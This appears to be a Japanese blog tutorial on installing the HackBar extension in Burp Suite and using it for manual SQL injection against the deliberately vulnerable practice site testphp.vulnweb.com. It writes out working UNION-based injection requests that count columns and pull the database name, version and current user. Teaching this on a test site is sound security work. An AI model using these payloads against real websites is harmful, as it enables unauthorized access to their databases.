Shikata Ga Nai

Private? There is no such things.

Burp SuiteにHackBarをインストールしてみた

Hello there, ('ω')ノ

 

Hackbarは、手動テストの手順に役立つように設計されたプラグインで。

まずは、下記からダウンロードして。

 https://github.com/d3vilbug/HackBar/releases/tag/1.0

 

f:id:ThisIsOne:20211220155459p:plain

 

あとは、インポートするだけで。

 

f:id:ThisIsOne:20211220155920p:plain

 

無事にインストールを確認できて。

 

f:id:ThisIsOne:20211220155937p:plain

 

使い方は、挿入箇所にマウスを当てて右クリックで選択を。

 

f:id:ThisIsOne:20211220160123p:plain

 

インターセプトでも使用できて。

 

f:id:ThisIsOne:20211220161203p:plain

 

とりあえず、下記のサイトで試してみることに。

 http://testphp.vulnweb.com/artists.php

 

f:id:ThisIsOne:20211220162547p:plain

 

前のぺージよりartistを選択して。

 

f:id:ThisIsOne:20211220162444p:plain

 

リクエストを確認して。

 

f:id:ThisIsOne:20211220162425p:plain

 

パラメータの後ろにOrder Byを挿入することに。

 

f:id:ThisIsOne:20211220162646p:plain

 

カラム数は、2を入力すると。

 

f:id:ThisIsOne:20211220162951p:plain

 

下記のように挿入されて。

 GET /artists.php?artist=1+Order+By+2+

 

f:id:ThisIsOne:20211220162914p:plain

 

あとは、直接パラメータを変更したほうが効率は良くて。

 GET /artists.php?artist=1+Order+By+3+

f:id:ThisIsOne:20211220163042p:plain

 

ここでエラーが出たので、カラム数は3つのようで。

 GET /artists.php?artist=1+Order+By+4+

 

f:id:ThisIsOne:20211220163145p:plain

 

次にUNIONを試すことに。

複数のSELECTの結果を、ひとまとめにして表示するのがUNIONで。

 

f:id:ThisIsOne:20211220165954p:plain

 

f:id:ThisIsOne:20211220170024p:plain

 

下記のように挿入されるもののシステムは。

結果を1行分のデータしか表示しないようなので。

1行目のデータを表示されないようにする必要があって。

つまり、開発者が1行しか表示しないようにしているというわけで。

 GET /artists.php?artist=1+Union+Select+1,2,3+

 

f:id:ThisIsOne:20211220170049p:plain

 

なので、最初のクエリを無効にして、出力されないようにすると。

本来、2行目に出力されるべきものが出力されて。

 GET /artists.php?artist=-1+Union+Select+1,2,3+

 

その他の例は、以下のとおりで。

 GET /artists.php?artist=1+and+0+Union+Select+1,2,3+

 GET /artists.php?artist=1+and+false+Union+Select+1,2,3+

 GET /artists.php?artist=null+Union+Select+1,2,3+

 GET /artists.php?artist=1+and+0+Union+Select+1,2,3+

 

f:id:ThisIsOne:20211220170210p:plain

 

データベース名を探して。

 GET /artists.php?artist=-1+Union+Select+1,database(),3+

 

f:id:ThisIsOne:20211220173055p:plain

 

バージョンとユーザ名も。

 GET /artists.php?artist=-1+Union+Select+1,version(),current_user()+

 

f:id:ThisIsOne:20211220173237p:plain

 

バージョンが、8.0.22-0ubuntu0.20.04.2ということでmysqlのようで。

 https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.22-0ubuntu0.20.04.2

 

f:id:ThisIsOne:20211220182033p:plain

 

Best regards, (^^ゞ